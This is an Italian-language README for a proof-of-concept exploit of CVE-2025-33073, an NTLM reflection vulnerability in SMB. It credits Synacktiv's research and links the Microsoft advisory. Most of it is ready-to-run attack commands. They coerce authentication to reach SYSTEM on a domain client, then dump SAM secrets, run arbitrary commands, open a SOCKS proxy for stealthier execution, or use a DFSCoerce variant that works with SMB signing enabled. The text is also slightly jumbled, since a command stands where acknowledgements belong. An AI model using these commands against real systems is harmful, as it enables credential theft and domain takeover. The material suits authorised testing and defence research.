
Exploit PoC per la vulnerabilità SMB di NTLM reflection.
PoC Exploit per la falla SMB di reflection NTLM.
Tutto il merito va alla ricerca ufficiale:
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
OS: Kali Linux (ha la maggior parte dei pacchetti preinstallati).
Lo strumento userà automaticamente un ambiente virtuale. Per configurarlo, esegui:
./setup.sh
Questo creerà un ambiente virtuale e installerà tutte le dipendenze richieste, inclusa ldap3-bleeding-edge==2.10.1.1337.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
Comando personalizzato
Invece di eseguire secretsdump, è possibile eseguire un comando personalizzato.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"

SOCKS
Per un'esecuzione più stealth dei comandi dopo aver stabilito una connessione valida come SYSTEM. --target e --target-ip devono essere uguali qui.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks
È anche possibile eseguire un comando personalizzato tramite proxychains invece di dumpare il SAM.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

È stata condotta una ricerca per verificare se la reflection non funzionasse davvero con SMB signing abilitato, che ha portato alla scoperta di bug per cui, se SIGN/SEAL vengono rimossi dal pacchetto, è possibile fare relay da SMB a LDAPS, cosa solitamente non possibile a causa del MIC.
Ringraziamenti a:
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
Se ti trovi nello stesso dominio broadcast del dispositivo ed è vulnerabile all'avvelenamento LLMNR, è possibile sfruttare un dispositivo senza dover registrare un record DNS.

L'autenticazione NTLM locale avviene

L'autenticazione NTLM locale non avviene, portando a un tentativo FAILED

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073